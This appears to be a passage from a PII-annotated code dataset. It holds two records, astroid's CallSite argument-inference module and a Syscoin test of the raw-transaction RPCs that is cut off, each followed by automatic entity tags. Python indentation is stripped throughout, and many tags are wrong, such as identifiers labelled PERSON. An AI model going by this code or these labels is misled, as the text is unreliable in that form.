'haproxy.as'], ['URL', 'mock.AN'], ['URL', 'low.ca'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'config.re'], ['URL', 'value.ge'], ['URL', 'registrations.re'], ['URL', 'service.ma'], ['URL', 'namespace.re'], ['URL', 'service.re'], ['URL', 'service.ma'], ['URL', 'services.re'], ['URL', 'service.ma'], ['URL', 'mock.Ma'], ['URL', 'maintenance.sy'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostbyname.re'], ['URL', 'service.ma'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostbyname.re'], ['URL', 'service.ma'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostbyname.re'], ['URL', 'service.ma'], ['URL', 'maintenance.is']] |
75 | # Copyright (c) 2015-2016, 2018-2020 Claudiu Popa dummy@email.com
# Copyright (c) 2015-2016 Ceridwen dummy@email.com
# Copyright (c) 2018 Bryce Guinta dummy@email.com
# Copyright (c) 2018 Nick Drozd dummy@email.com
# Copyright (c) 2018 Anthony Sottile dummy@email.com
# Copyright (c) 2020 hippo91 dummy@email.com
# Copyright (c) 2021 Pierre Sassoulas dummy@email.com
# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html
# For details: https://github.com/PyCQA/astroid/blob/master/LICENSE
from astroid import bases
from astroid import context as contextmod
from astroid import exceptions, nodes, util
class CallSite:
"""Class for understanding arguments passed into a call site
It needs a call context, which contains the arguments and the
keyword arguments that were passed into a given call site.
In order to infer what an argument represents, call :meth:`infer_argument`
with the corresponding function node and the argument name.
:param callcontext:
An instance of :class:`astroid.context.CallContext`, that holds
the arguments for the call site.
:param argument_context_map:
Additional contexts per node, passed in from :attr:`astroid.context.Context.extra_context`
:param context:
An instance of :class:`astroid.context.Context`.
"""
def __init__(self, callcontext, argument_context_map=None, context=None):
if argument_context_map is None:
argument_context_map = {}
self.argument_context_map = argument_context_map
args = callcontext.args
keywords = callcontext.keywords
self.duplicated_keywords = set()
self._unpacked_args = self._unpack_args(args, context=context)
self._unpacked_kwargs = self._unpack_keywords(keywords, context=context)
self.positional_arguments = [
arg for arg in self._unpacked_args if arg is not util.Uninferable
]
self.keyword_arguments = {
key: value
for key, value in self._unpacked_kwargs.items()
if value is not util.Uninferable
}
@classmethod
def from_call(cls, call_node, context=None):
"""Get a CallSite object from the given Call node.
:param context:
An instance of :class:`astroid.context.Context` that will be used
to force a single inference path.
"""
# Determine the callcontext from the given `context` object if any.
context = context or contextmod.InferenceContext()
callcontext = contextmod.CallContext(call_node.args, call_node.keywords)
return cls(callcontext, context=context)
def has_invalid_arguments(self):
"""Check if in the current CallSite were passed *invalid* arguments
This can mean multiple things. For instance, if an unpacking
of an invalid object was passed, then this method will return True.
Other cases can be when the arguments can't be inferred by astroid,
for example, by passing objects which aren't known statically.
"""
return len(self.positional_arguments) != len(self._unpacked_args)
def has_invalid_keywords(self):
"""Check if in the current CallSite were passed *invalid* keyword arguments
For instance, unpacking a dictionary with integer keys is invalid
(**{1:2}), because the keys must be strings, which will make this
method to return True. Other cases where this might return True if
objects which can't be inferred were passed.
"""
return len(self.keyword_arguments) != len(self._unpacked_kwargs)
def _unpack_keywords(self, keywords, context=None):
values = {}
context = context or contextmod.InferenceContext()
context.extra_context = self.argument_context_map
for name, value in keywords:
if name is None:
# Then it's an unpacking operation (**)
try:
inferred = next(value.infer(context=context))
except exceptions.InferenceError:
values[name] = util.Uninferable
continue
if not isinstance(inferred, nodes.Dict):
# Not something we can work with.
values[name] = util.Uninferable
continue
for dict_key, dict_value in inferred.items:
try:
dict_key = next(dict_key.infer(context=context))
except exceptions.InferenceError:
values[name] = util.Uninferable
continue
if not isinstance(dict_key, nodes.Const):
values[name] = util.Uninferable
continue
if not isinstance(dict_key.value, str):
values[name] = util.Uninferable
continue
if dict_key.value in values:
# The name is already in the dictionary
values[dict_key.value] = util.Uninferable
self.duplicated_keywords.add(dict_key.value)
continue
values[dict_key.value] = dict_value
else:
values[name] = value
return values
def _unpack_args(self, args, context=None):
values = []
context = context or contextmod.InferenceContext()
context.extra_context = self.argument_context_map
for arg in args:
if isinstance(arg, nodes.Starred):
try:
inferred = next(arg.value.infer(context=context))
except exceptions.InferenceError:
values.append(util.Uninferable)
continue
if inferred is util.Uninferable:
values.append(util.Uninferable)
continue
if not hasattr(inferred, "elts"):
values.append(util.Uninferable)
continue
values.extend(inferred.elts)
else:
values.append(arg)
return values
def infer_argument(self, funcnode, name, context):
"""infer a function argument value according to the call context
Arguments:
funcnode: The function being called.
name: The name of the argument whose value is being inferred.
context: Inference context object
"""
if name in self.duplicated_keywords:
raise exceptions.InferenceError(
"The arguments passed to {func!r} " " have duplicate keywords.",
call_site=self,
func=funcnode,
arg=name,
context=context,
)
# Look into the keywords first, maybe it's already there.
try:
return self.keyword_arguments[name].infer(context)
except KeyError:
pass
# Too many arguments given and no variable arguments.
if len(self.positional_arguments) > len(funcnode.args.args):
if not funcnode.args.vararg and not funcnode.args.posonlyargs:
raise exceptions.InferenceError(
"Too many positional arguments "
"passed to {func!r} that does "
"not have *args.",
call_site=self,
func=funcnode,
arg=name,
context=context,
)
positional = self.positional_arguments[: len(funcnode.args.args)]
vararg = self.positional_arguments[len(funcnode.args.args) :]
argindex = funcnode.args.find_argname(name)[0]
kwonlyargs = {arg.name for arg in funcnode.args.kwonlyargs}
kwargs = {
key: value
for key, value in self.keyword_arguments.items()
if key not in kwonlyargs
}
# If there are too few positionals compared to
# what the function expects to receive, check to see
# if the missing positional arguments were passed
# as keyword arguments and if so, place them into the
# positional args list.
if len(positional) < len(funcnode.args.args):
for func_arg in funcnode.args.args:
if func_arg.name in kwargs:
arg = kwargs.pop(func_arg.name)
positional.append(arg)
if argindex is not None:
# 2. first argument of instance/class method
if argindex == 0 and funcnode.type in ("method", "classmethod"):
if context.boundnode is not None:
boundnode = context.boundnode
else:
# XXX can do better ?
boundnode = funcnode.parent.frame()
if isinstance(boundnode, nodes.ClassDef):
# Verify that we're accessing a method
# of the metaclass through a class, as in
# `cls.metaclass_method`. In this case, the
# first argument is always the class.
method_scope = funcnode.parent.scope()
if method_scope is boundnode.metaclass():
return iter((boundnode,))
if funcnode.type == "method":
if not isinstance(boundnode, bases.Instance):
boundnode = boundnode.instantiate_class()
return iter((boundnode,))
if funcnode.type == "classmethod":
return iter((boundnode,))
# if we have a method, extract one position
# from the index, so we'll take in account
# the extra parameter represented by `self` or `cls`
if funcnode.type in ("method", "classmethod"):
argindex -= 1
# 2. search arg index
try:
return self.positional_arguments[argindex].infer(context)
except IndexError:
pass
if funcnode.args.kwarg == name:
# It wants all the keywords that were passed into
# the call site.
if self.has_invalid_keywords():
raise exceptions.InferenceError(
"Inference failed to find values for all keyword arguments "
"to {func!r}: {unpacked_kwargs!r} doesn't correspond to "
"{keyword_arguments!r}.",
keyword_arguments=self.keyword_arguments,
unpacked_kwargs=self._unpacked_kwargs,
call_site=self,
func=funcnode,
arg=name,
context=context,
)
kwarg = nodes.Dict(
lineno=funcnode.args.lineno,
col_offset=funcnode.args.col_offset,
parent=funcnode.args,
)
kwarg.postinit(
[(nodes.const_factory(key), value) for key, value in kwargs.items()]
)
return iter((kwarg,))
if funcnode.args.vararg == name:
# It wants all the args that were passed into
# the call site.
if self.has_invalid_arguments():
raise exceptions.InferenceError(
"Inference failed to find values for all positional "
"arguments to {func!r}: {unpacked_args!r} doesn't "
"correspond to {positional_arguments!r}.",
positional_arguments=self.positional_arguments,
unpacked_args=self._unpacked_args,
call_site=self,
func=funcnode,
arg=name,
context=context,
)
args = nodes.Tuple(
lineno=funcnode.args.lineno,
col_offset=funcnode.args.col_offset,
parent=funcnode.args,
)
args.postinit(vararg)
return iter((args,))
# Check if it's a default parameter.
try:
return funcnode.args.default_value(name).infer(context)
except exceptions.NoDefault:
pass
raise exceptions.InferenceError(
"No value found for argument {arg} to {func!r}",
call_site=self,
func=funcnode,
arg=name,
context=context,
)
| 12,599 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015-2016'], ['DATE_TIME', '2018-2020'], ['PERSON', 'Claudiu Popa'], ['DATE_TIME', '2015-2016'], ['PERSON', 'Ceridwen'], ['PERSON', 'Nick Drozd'], ['PERSON', 'Anthony Sottile'], ['DATE_TIME', '2020'], ['PERSON', 'hippo91'], ['DATE_TIME', '2021'], ['PERSON', 'Pierre Sassoulas'], ['PERSON', 'callcontext = contextmod'], ['PERSON', 'kwonlyargs'], ['PERSON', 'boundnode'], ['PERSON', 'boundnode'], ['PERSON', 'lineno=funcnode.args.lineno'], ['PERSON', 'lineno=funcnode.args.lineno'], ['URL', 'https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html'], ['URL', 'https://github.com/PyCQA/astroid/blob/master/LICENSE'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'astroid.context.Ca'], ['URL', 'astroid.context.Co'], ['URL', 'astroid.context.Co'], ['URL', 'self.ar'], ['URL', 'callcontext.ar'], ['URL', 'callcontext.ke'], ['URL', 'self.ke'], ['URL', 'kwargs.it'], ['URL', 'astroid.context.Co'], ['URL', 'contextmod.In'], ['URL', 'contextmod.Ca'], ['URL', 'node.ar'], ['URL', 'node.ke'], ['URL', 'self.ke'], ['URL', 'contextmod.In'], ['URL', 'self.ar'], ['URL', 'value.in'], ['URL', 'exceptions.In'], ['URL', 'inferred.it'], ['URL', 'key.in'], ['URL', 'exceptions.In'], ['URL', 'nodes.Co'], ['URL', 'key.va'], ['URL', 'key.va'], ['URL', 'key.va'], ['URL', 'keywords.ad'], ['URL', 'key.va'], ['URL', 'key.va'], ['URL', 'contextmod.In'], ['URL', 'self.ar'], ['URL', 'nodes.St'], ['URL', 'arg.value.in'], ['URL', 'exceptions.In'], ['URL', 'exceptions.In'], ['URL', 'self.ke'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.va'], ['URL', 'funcnode.ar'], ['URL', 'exceptions.In'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.fi'], ['URL', 'arg.na'], ['URL', 'funcnode.args.kw'], ['URL', 'self.ke'], ['URL', 'arguments.it'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.ar'], ['URL', 'arg.na'], ['URL', 'arg.na'], ['URL', 'context.bo'], ['URL', 'context.bo'], ['URL', 'funcnode.parent.fr'], ['URL', 'nodes.Cl'], ['URL', 'cls.me'], ['URL', 'funcnode.parent.sc'], ['URL', 'boundnode.me'], ['URL', 'bases.In'], ['URL', 'boundnode.in'], ['URL', 'funcnode.args.kw'], ['URL', 'exceptions.In'], ['URL', 'self.ke'], ['URL', 'funcnode.args.li'], ['URL', 'funcnode.args.co'], ['URL', 'funcnode.ar'], ['URL', 'nodes.co'], ['URL', 'kwargs.it'], ['URL', 'funcnode.args.va'], ['URL', 'exceptions.In'], ['URL', 'funcnode.args.li'], ['URL', 'funcnode.args.co'], ['URL', 'funcnode.ar'], ['URL', 'funcnode.args.de'], ['URL', 'exceptions.No'], ['URL', 'exceptions.In']] |
76 | #!/usr/bin/env python3
# Copyright (c) 2014-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the rawtransaction RPCs.
Test the following RPCs:
- createrawtransaction
- signrawtransactionwithwallet
- sendrawtransaction
- decoderawtransaction
- getrawtransaction
"""
from collections import OrderedDict
from decimal import Decimal
from io import BytesIO
from test_framework.messages import CTransaction, ToHex
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
find_vout_for_address,
hex_str_to_bytes,
)
class multidict(dict):
"""Dictionary that allows duplicate keys.
Constructed with a list of (key, value) tuples. When dumped by the json module,
will output invalid json with repeated keys, eg:
>>> json.dumps(multidict([(1,2),(1,2)])
'{"1": 2, "1": 2}'
Used to test calls to rpc methods with repeated keys in the json object."""
def __init__(self, x):
dict.__init__(self, x)
self.x = x
def items(self):
return self.x
# Create one-input, one-output, no-fee transaction:
class RawTransactionsTest(SyscoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [
["-txindex"],
["-txindex"],
["-txindex"],
]
self.supports_cli = False
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def setup_network(self):
super().setup_network()
self.connect_nodes(0, 2)
def run_test(self):
self.log.info('prepare some coins for multiple *rawtransaction commands')
self.nodes[2].generate(1)
self.sync_all()
self.nodes[0].generate(101)
self.sync_all()
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.5)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.0)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),5.0)
self.sync_all()
self.nodes[0].generate(5)
self.sync_all()
self.log.info('Test getrawtransaction on genesis block coinbase returns an error')
block = self.nodes[0].getblock(self.nodes[0].getblockhash(0))
assert_raises_rpc_error(-5, "The genesis block coinbase is not considered an ordinary transaction", self.nodes[0].getrawtransaction, block['merkleroot'])
self.log.info('Check parameter types and required parameters of createrawtransaction')
# Test `createrawtransaction` required parameters
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction)
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction, [])
# Test `createrawtransaction` invalid extra parameters
assert_raises_rpc_error(-1, "createrawtransaction", self.nodes[0].createrawtransaction, [], {}, 0, False, 'foo')
# Test `createrawtransaction` invalid `inputs`
txid = 'PI:KEY'
assert_raises_rpc_error(-3, "Expected type array", self.nodes[0].createrawtransaction, 'foo', {})
assert_raises_rpc_error(-1, "JSON value is not an object as expected", self.nodes[0].createrawtransaction, ['foo'], {})
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].createrawtransaction, [{}], {})
assert_raises_rpc_error(-8, "txid must be of length 64 (not 3, for 'foo')", self.nodes[0].createrawtransaction, [{'txid': 'foo'}], {})
assert_raises_rpc_error(-8, "txid must be hexadecimal string (not 'PI:KEY')", self.nodes[0].createrawtransaction, [{'txid': 'PI:KEY'}], {})
assert_raises_rpc_error(-8, "Invalid parameter, missing vout key", self.nodes[0].createrawtransaction, [{'txid': txid}], {})
assert_raises_rpc_error(-8, "Invalid parameter, missing vout key", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': 'foo'}], {})
assert_raises_rpc_error(-8, "Invalid parameter, vout cannot be negative", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': -1}], {})
assert_raises_rpc_error(-8, "Invalid parameter, sequence number is out of range", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': 0, 'sequence': -1}], {})
# Test `createrawtransaction` invalid `outputs`
address = self.nodes[0].getnewaddress()
address2 = self.nodes[0].getnewaddress()
assert_raises_rpc_error(-1, "JSON value is not an array as expected", self.nodes[0].createrawtransaction, [], 'foo')
self.nodes[0].createrawtransaction(inputs=[], outputs={}) # Should not throw for backwards compatibility
self.nodes[0].createrawtransaction(inputs=[], outputs=[])
assert_raises_rpc_error(-8, "Data must be hexadecimal string", self.nodes[0].createrawtransaction, [], {'data': 'foo'})
assert_raises_rpc_error(-5, "Invalid Syscoin address", self.nodes[0].createrawtransaction, [], {'foo': 0})
assert_raises_rpc_error(-3, "Invalid amount", self.nodes[0].createrawtransaction, [], {address: 'foo'})
assert_raises_rpc_error(-3, "Amount out of range", self.nodes[0].createrawtransaction, [], {address: -1})
assert_raises_rpc_error(-8, "Invalid parameter, duplicated address: %s" % address, self.nodes[0].createrawtransaction, [], multidict([(address, 1), (address, 1)]))
assert_raises_rpc_error(-8, "Invalid parameter, duplicated address: %s" % address, self.nodes[0].createrawtransaction, [], [{address: 1}, {address: 1}])
assert_raises_rpc_error(-8, "Invalid parameter, duplicate key: data", self.nodes[0].createrawtransaction, [], [{"data": 'aa'}, {"data": "bb"}])
assert_raises_rpc_error(-8, "Invalid parameter, duplicate key: data", self.nodes[0].createrawtransaction, [], multidict([("data", 'aa'), ("data", "bb")]))
assert_raises_rpc_error(-8, "Invalid parameter, key-value pair must contain exactly one key", self.nodes[0].createrawtransaction, [], [{'a': 1, 'b': 2}])
assert_raises_rpc_error(-8, "Invalid parameter, key-value pair not an object as expected", self.nodes[0].createrawtransaction, [], [['key-value pair1'], ['2']])
# Test `createrawtransaction` invalid `locktime`
assert_raises_rpc_error(-3, "Expected type number", self.nodes[0].createrawtransaction, [], {}, 'foo')
assert_raises_rpc_error(-8, "Invalid parameter, locktime out of range", self.nodes[0].createrawtransaction, [], {}, -1)
assert_raises_rpc_error(-8, "Invalid parameter, locktime out of range", self.nodes[0].createrawtransaction, [], {}, 4294967296)
# Test `createrawtransaction` invalid `replaceable`
assert_raises_rpc_error(-3, "Expected type bool", self.nodes[0].createrawtransaction, [], {}, 0, 'foo')
self.log.info('Check that createrawtransaction accepts an array and object as outputs')
tx = CTransaction()
# One output
tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs={address: 99}))))
assert_equal(len(tx.vout), 1)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}]),
)
# Two outputs
tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=OrderedDict([(address, 99), (address2, 99)])))))
assert_equal(len(tx.vout), 2)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}, {address2: 99}]),
)
# Multiple mixed outputs
tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=multidict([(address, 99), (address2, 99), ('data', '99')])))))
assert_equal(len(tx.vout), 3)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}, {address2: 99}, {'data': '99'}]),
)
for type in ["bech32", "p2sh-segwit", "legacy"]:
addr = self.nodes[0].getnewaddress("", type)
addrinfo = self.nodes[0].getaddressinfo(addr)
pubkey = addrinfo["scriptPubKey"]
self.log.info('sendrawtransaction with missing prevtx info (%s)' %(type))
# Test `signrawtransactionwithwallet` invalid `prevtxs`
inputs = [ {'txid' : txid, 'vout' : 3, 'sequence' : 1000}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
prevtx = dict(txid=txid, scriptPubKey=pubkey, vout=3, amount=1)
succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])
assert succ["complete"]
if type == "legacy":
del prevtx["amount"]
succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])
assert succ["complete"]
if type != "legacy":
assert_raises_rpc_error(-3, "Missing amount", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"txid": txid,
"scriptPubKey": pubkey,
"vout": 3,
}
])
assert_raises_rpc_error(-3, "Missing vout", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"txid": txid,
"scriptPubKey": pubkey,
"amount": 1,
}
])
assert_raises_rpc_error(-3, "Missing txid", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"scriptPubKey": pubkey,
"vout": 3,
"amount": 1,
}
])
assert_raises_rpc_error(-3, "Missing scriptPubKey", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
"txid": txid,
"vout": 3,
"amount": 1
}
])
#########################################
# sendrawtransaction with missing input #
#########################################
self.log.info('sendrawtransaction with missing input')
inputs = [ {'txid' : "PI:KEY", 'vout' : 1}] #won't exists
outputs = { self.nodes[0].getnewaddress() : 4.998 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
rawtx = self.nodes[2].signrawtransactionwithwallet(rawtx)
# This will raise an exception since there are missing inputs
assert_raises_rpc_error(-25, "bad-txns-inputs-missingorspent", self.nodes[2].sendrawtransaction, rawtx['hex'])
#####################################
# getrawtransaction with block hash #
#####################################
# make a tx by sending then generate 2 blocks; block1 has the tx in it
tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress(), 1)
block1, block2 = self.nodes[2].generate(2)
self.sync_all()
# We should be able to get the raw transaction by providing the correct block
gottx = self.nodes[0].getrawtransaction(tx, True, block1)
assert_equal(gottx['txid'], tx)
assert_equal(gottx['in_active_chain'], True)
# We should have the 'in_active_chain' flag when we don't provide a block due to blockindexdb
gottx = self.nodes[0].getrawtransaction(tx, True)
assert_equal(gottx['txid'], tx)
# SYSCOIN
assert 'in_active_chain' in gottx
# We should not get the tx if we provide an unrelated block
assert_raises_rpc_error(-5, "No such transaction found", self.nodes[0].getrawtransaction, tx, True, block2)
# An invalid block hash should raise the correct errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].getrawtransaction, tx, True, True)
assert_raises_rpc_error(-8, "parameter 3 must be of length 64 (not 6, for 'foobar')", self.nodes[0].getrawtransaction, tx, True, "foobar")
assert_raises_rpc_error(-8, "parameter 3 must be of length 64 (not 8, for 'abcd1234')", self.nodes[0].getrawtransaction, tx, True, "abcd1234")
assert_raises_rpc_error(-8, "parameter 3 must be hexadecimal string (not 'ZZZ0000000000000000000000000000000000000000000000000000000000000')", self.nodes[0].getrawtransaction, tx, True, "ZZZ0000000000000000000000000000000000000000000000000000000000000")
assert_raises_rpc_error(-5, "Block hash not found", self.nodes[0].getrawtransaction, tx, True, "0000000000000000000000000000000000000000000000000000000000000000")
# Undo the blocks and check in_active_chain
self.nodes[0].invalidateblock(block1)
gottx = self.nodes[0].getrawtransaction(txid=tx, verbose=True, blockhash=block1)
assert_equal(gottx['in_active_chain'], False)
self.nodes[0].reconsiderblock(block1)
assert_equal(self.nodes[0].getbestblockhash(), block2)
if not self.options.descriptors:
# The traditional multisig workflow does not work with descriptor wallets so these are legacy only.
# The multisig workflow with descriptor wallets uses PSBTs and is tested elsewhere, no need to do them here.
#########################
# RAW TX MULTISIG TESTS #
#########################
# 2of2 test
addr1 = self.nodes[2].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[2].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
# Tests for createmultisig and addmultisigaddress
assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 1, ["01020304"])
self.nodes[0].createmultisig(2, [addr1Obj['pubkey'], addr2Obj['pubkey']]) # createmultisig can only take public keys
assert_raises_rpc_error(-5, "Invalid public key", self.nodes[0].createmultisig, 2, [addr1Obj['pubkey'], addr1]) # addmultisigaddress can take both pubkeys and addresses so long as they are in the wallet, which is tested here.
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr1])['address']
#use balance deltas instead of absolute values
bal = self.nodes[2].getbalance()
# send 1.2 SYS to msig adr
txId = self.nodes[0].sendtoaddress(mSigObj, 1.2)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[2].getbalance(), bal+Decimal('1.20000000')) #node2 has both keys of the 2of2 ms addr., tx should affect the balance
# 2of3 test from different nodes
bal = self.nodes[2].getbalance()
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr3 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[1].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
addr3Obj = self.nodes[2].getaddressinfo(addr3)
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey']])['address']
txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
decTx = self.nodes[0].gettransaction(txId)
rawTx = self.nodes[0].decoderawtransaction(decTx['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
#THIS IS AN INCOMPLETE FEATURE
#NODE2 HAS TWO OF THREE KEY AND THE FUNDS SHOULD BE SPENDABLE AND COUNT AT BALANCE CALCULATION
assert_equal(self.nodes[2].getbalance(), bal) #for now, assume the funds of a 2of3 multisig tx are not marked as spendable
txDetails = self.nodes[0].gettransaction(txId, True)
rawTx = self.nodes[0].decoderawtransaction(txDetails['hex'])
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('2.20000000'))
bal = self.nodes[0].getbalance()
inputs = [{ "txid" : txId, "vout" : vout['n'], "scriptPubKey" : vout['scriptPubKey']['hex'], "amount" : vout['value']}]
outputs = { self.nodes[0].getnewaddress() : 2.19 }
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxPartialSigned = self.nodes[1].signrawtransactionwithwallet(rawTx, inputs)
assert_equal(rawTxPartialSigned['complete'], False) #node1 only has one key, can't comp. sign the tx
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx, inputs)
assert_equal(rawTxSigned['complete'], True) #node2 can sign the tx compl., own two of three keys
self.nodes[2].sendrawtransaction(rawTxSigned['hex'])
rawTx = self.nodes[0].decoderawtransaction(rawTxSigned['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), bal+Decimal('50.00000000')+Decimal('2.19000000')) #block reward + tx
# 2of2 test for combining transactions
bal = self.nodes[2].getbalance()
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[1].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
mSigObjValid = self.nodes[2].getaddressinfo(mSigObj)
txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
decTx = self.nodes[0].gettransaction(txId)
rawTx2 = self.nodes[0].decoderawtransaction(decTx['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[2].getbalance(), bal) # the funds of a 2of2 multisig tx should not be marked as spendable
txDetails = self.nodes[0].gettransaction(txId, True)
rawTx2 = self.nodes[0].decoderawtransaction(txDetails['hex'])
vout = next(o for o in rawTx2['vout'] if o['value'] == Decimal('2.20000000'))
bal = self.nodes[0].getbalance()
inputs = [{ "txid" : txId, "vout" : vout['n'], "scriptPubKey" : vout['scriptPubKey']['hex'], "redeemScript" : mSigObjValid['hex'], "amount" : vout['value']}]
outputs = { self.nodes[0].getnewaddress() : 2.19 }
rawTx2 = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxPartialSigned1 = self.nodes[1].signrawtransactionwithwallet(rawTx2, inputs)
self.log.debug(rawTxPartialSigned1)
assert_equal(rawTxPartialSigned1['complete'], False) #node1 only has one key, can't comp. sign the tx
rawTxPartialSigned2 = self.nodes[2].signrawtransactionwithwallet(rawTx2, inputs)
self.log.debug(rawTxPartialSigned2)
assert_equal(rawTxPartialSigned2['complete'], False) #node2 only has one key, can't comp. sign the tx
rawTxComb = self.nodes[2].combinerawtransaction([rawTxPartialSigned1['hex'], rawTxPartialSigned2['hex']])
self.log.debug(rawTxComb)
self.nodes[2].sendrawtransaction(rawTxComb)
rawTx2 = self.nodes[0].decoderawtransaction(rawTxComb)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), bal+Decimal('50.00000000')+Decimal('2.19000000')) #block reward + tx
# decoderawtransaction tests
# witness transaction
encrawtx = "PI:KEY"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx, True) # decode as witness transaction
assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # force decode as non-witness transaction
# non-witness transaction
encrawtx = "PI:KEY"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx, False) # decode as non-witness transaction
assert_equal(decrawtx['vout'][0]['value'], Decimal('1.00000000'))
# known ambiguous transaction in the chain (see https://github.com/bitcoin/bitcoin/issues/20579)
encrawtx = "PI:KEY"
decrawtx = self.nodes[0].decoderawtransaction(encrawtx)
decrawtx_wit = self.nodes[0].decoderawtransaction(encrawtx, True)
assert_raises_rpc_error(-22, 'TX decode failed', self.nodes[0].decoderawtransaction, encrawtx, False) # fails to decode as non-witness transaction
assert_equal(decrawtx, decrawtx_wit) # the witness interpretation should be chosen
assert_equal(decrawtx['vin'][0]['coinbase'], "PI:KEY")
# Basic signrawtransaction test
addr = self.nodes[1].getnewaddress()
txid = self.nodes[0].sendtoaddress(addr, 10)
self.nodes[0].generate(1)
self.sync_all()
vout = find_vout_for_address(self.nodes[1], txid, addr)
rawTx = self.nodes[1].createrawtransaction([{'txid': txid, 'vout': vout}], {self.nodes[1].getnewaddress(): 9.999})
